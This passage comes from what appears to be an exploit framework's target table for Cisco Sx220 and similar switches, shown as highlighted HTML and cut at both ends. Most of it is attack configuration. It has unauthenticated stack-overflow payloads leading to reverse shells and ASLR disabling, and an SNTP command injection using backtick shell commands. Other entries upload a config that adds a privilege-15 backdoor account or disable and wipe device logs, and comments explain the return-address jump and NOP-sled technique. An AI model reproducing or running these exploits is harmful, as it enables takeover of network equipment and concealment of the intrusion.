					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;login=1'</span><span class="token punctuation">,</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Cisco'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Cisco Systems, Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'Sx220'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.cisco.com/c/en/us/support/switches/small-business-220-series-smart-plus-switches/tsd-products-support-series-home.html'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_login'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_main'</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'rsa'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;password=PASSWORD&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=home_loginStatus'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;ram_sev_0=on&amp;ram_sev_1=on&amp;ram_sev_2=on&amp;ram_sev_3=on&amp;ram_sev_4=on&amp;ram_sev_5=on&amp;ram_sev_6=on&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=log_settings'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_fileClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=log_ramClear'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'httpuploadbakcfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "backup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadbakcfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/backup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/backup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadlang.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'html'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "language" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadlang.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>		<span class="token comment"># </span>
							<span class="token string">'content'</span><span class="token punctuation">:</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">30</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token comment"># We checking returned 'errMsgLangMG' and LEN of this text</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'errMsgLangMG'</span><span class="token punctuation">,</span>	<span class="token comment">#</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpuploadruncfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/update "running-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_saverun_cfg'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/var/config/running-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httprestorecfg.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload "startup-config" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httprestorecfg.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'/mnt/startup-config'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'httpupload.cgi'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)'</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/http_uploadfail'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span> <span class="token comment"># Not the real content, its the result of invalid firmware (workaround)</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'login.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/VUL.TXT'</span><span class="token punctuation">,</span> <span class="token comment"># We cannot control the content...</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">32</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;password=/tmp/VUL.TXT&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'2'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'md5'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=aaa_userDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>					<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>						<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpServer=+&amp;cursntpPort=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntpStatus=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
